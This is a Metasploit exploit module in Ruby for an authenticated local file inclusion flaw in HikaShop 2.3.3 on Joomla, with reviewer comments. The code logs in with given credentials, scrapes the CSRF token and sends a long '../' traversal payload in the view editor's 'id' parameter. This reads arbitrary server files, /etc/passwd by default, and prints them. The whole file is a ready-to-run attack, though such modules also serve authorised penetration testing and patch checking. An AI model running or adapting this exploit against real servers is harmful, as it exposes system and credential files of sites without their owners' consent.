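##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# HikaShop 2.3.3 authenticated local file include (PoC).
#
# Flow: fetch the Joomla admin login page (session cookie + CSRF token), log in with
# the supplied credentials, then request the HikaShop view editor with a traversal in
# the `id` parameter so the component includes an arbitrary file and echoes it back.
class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Traversal prefix that escapes the HikaShop component directory. Copied verbatim from
  # the original PoC; the depth is what the author found to work against HikaShop 2.3.3.
  TRAVERSAL = '../../../../../../../../../../../../../../../../../../'.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HikaShop - LFI poc for authenticated users',
      'Description'    => %q{
        HikaShop 2.3.3 is vulnerable to local file include attack.
        Authenticated user can read local files from the server.
        Vulnerability was described on https://twitter.com/HauntITBlog
      },
      'Author'         =>
        [
          'HauntIT Blog', # Discovery / msf module
          'http://hauntit.blogspot.com'
        ],
      'License'        => MSF_LICENSE,
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0,
      # NOTE(review): day/month order is ambiguous and the framework expects 'Mon DD YYYY';
      # left as found because the page does not say which order the author meant.
      'DisclosureDate' => '03.01.2015'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base Joomla directory path', 'joomla']),
        OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
        OptString.new('PASSWORD', [false, 'Password to authenticate with', 'admin']),
        # Absolute path on the target; the default reproduces the original PoC exactly.
        OptString.new('FILEPATH', [true, 'Absolute path of the file to read', '/etc/passwd']),
        # The default matches the literal text '/error/'; set it to whatever the target's
        # failed-login page actually contains.
        OptRegexp.new('FAILPATTERN', [false, 'Pattern returned in response if login failed', '/error/'])
      ], self.class)
  end

  # No version fingerprint is attempted; the only way to tell is to run the exploit.
  # Returning Unknown (instead of the original's nil) keeps `check` usable from the console.
  def check
    Exploit::CheckCode::Unknown
  end

  # First 32-character hex string (an MD5-shaped token) found in +my_string+, or nil.
  # Joomla's login form CSRF token has this shape. Tolerates a nil body.
  def fetchMd5(my_string)
    my_string.to_s[/([0-9a-fA-F]{32})/, 1]
  end

  # HikaShop `id` value abused by the view editor: fixed template/component fields (values
  # copied from the PoC) followed by the traversal to +filepath+. The leading slash is
  # dropped so the fixed traversal prefix lands on the filesystem root.
  def lfi_payload(filepath)
    "0|beez3|component|com_hikashop|address|#{TRAVERSAL}#{filepath.to_s.sub(%r{\A/+}, '')}"
  end

  # Merge "k=v; k2=v2" cookie strings; a later jar overrides an earlier one for the same name.
  def merge_cookies(*jars)
    jars.flat_map { |jar| jar.to_s.split(/;\s*/) }
        .reject(&:empty?)
        .each_with_object({}) { |pair, acc| k, v = pair.split('=', 2); acc[k] = v }
        .map { |k, v| "#{k}=#{v}" }
        .join('; ')
  end

  def exploit
    admin_uri = normalize_uri(target_uri.path, 'administrator', 'index.php')

    # 1st: fetch the admin login page for the session cookie and the CSRF token.
    # (The original read the cookie header before checking for a nil response.)
    login_page = send_request_cgi('method' => 'GET', 'uri' => admin_uri)
    fail_with(Failure::Unreachable, '[-] Failed with 1st request') unless login_page

    # get_cookies yields only name=value pairs; the raw Set-Cookie header also carried
    # path/HttpOnly attributes, which the original sent back verbatim.
    cookies = login_page.get_cookies
    print_status("[+] Resp code: #{login_page.code}")
    print_good("[+] Cookie(s) : #{cookies}")

    # Joomla emits the token as a hidden input named after a 32-hex value with value 1, and
    # the login POST must echo it back under that name.
    # NOTE(review): the original extraction regex was lost in this copy of the module; using
    # the first MD5-shaped string on the page assumes nothing similar precedes the token — verify.
    token = fetchMd5(login_page.body)
    fail_with(Failure::UnexpectedReply, 'Cannot find login token in 1st response') unless token
    print_good("[+] Token : #{token}")

    lfi_id = lfi_payload(datastore['FILEPATH'])

    # 2nd: authenticate. `return` is Joomla's post-login redirect target, base64 of the
    # relative URL; the original shipped it as a pre-encoded literal of the same URL.
    auth = send_request_cgi(
      'method'    => 'POST',
      'uri'       => admin_uri,
      'cookie'    => cookies,
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'passwd'   => datastore['PASSWORD'],
        'option'   => 'com_login',
        'task'     => 'login',
        'return'   => Rex::Text.encode_base64("index.php?option=com_hikashop&ctrl=view&task=edit&id=#{lfi_id}"),
        token      => '1'
      }
    )
    fail_with(Failure::Unreachable, 'No response to login request') unless auth
    print_good("[+] Code after auth: #{auth.code}")

    # FAILPATTERN was registered but never consulted; without it a bad password silently
    # fell through to an unauthenticated LFI attempt whose body is just the login page.
    # Regexp.new(...to_s) accepts either the raw option string or an already-compiled Regexp.
    if datastore['FAILPATTERN'] && auth.body.to_s =~ Regexp.new(datastore['FAILPATTERN'].to_s)
      fail_with(Failure::NoAccess, 'Login appears to have failed (FAILPATTERN matched)')
    end

    # NOTE(review): Joomla may reissue the session cookie on login; keep the pre-login
    # cookies and let anything set by the login response override them — confirm on target.
    cookies = merge_cookies(cookies, auth.get_cookies)

    # 3rd: request the view editor with the traversal payload.
    print_status('[+] and now 3rd request...')
    xpl = send_request_cgi(
      'method'   => 'GET',
      'uri'      => admin_uri,
      'cookie'   => cookies,
      'vars_get' => {
        'option' => 'com_hikashop',
        'ctrl'   => 'view',
        'task'   => 'edit',
        'id'     => lfi_id
      }
    )
    fail_with(Failure::Unknown, '[-] Cannot exploit it :C') unless xpl

    print_good("[+] 3rd response code: #{xpl.code}")
    print_good('[+] 3rd (full) response body:')
    print_status(xpl.body.to_s)
  end
end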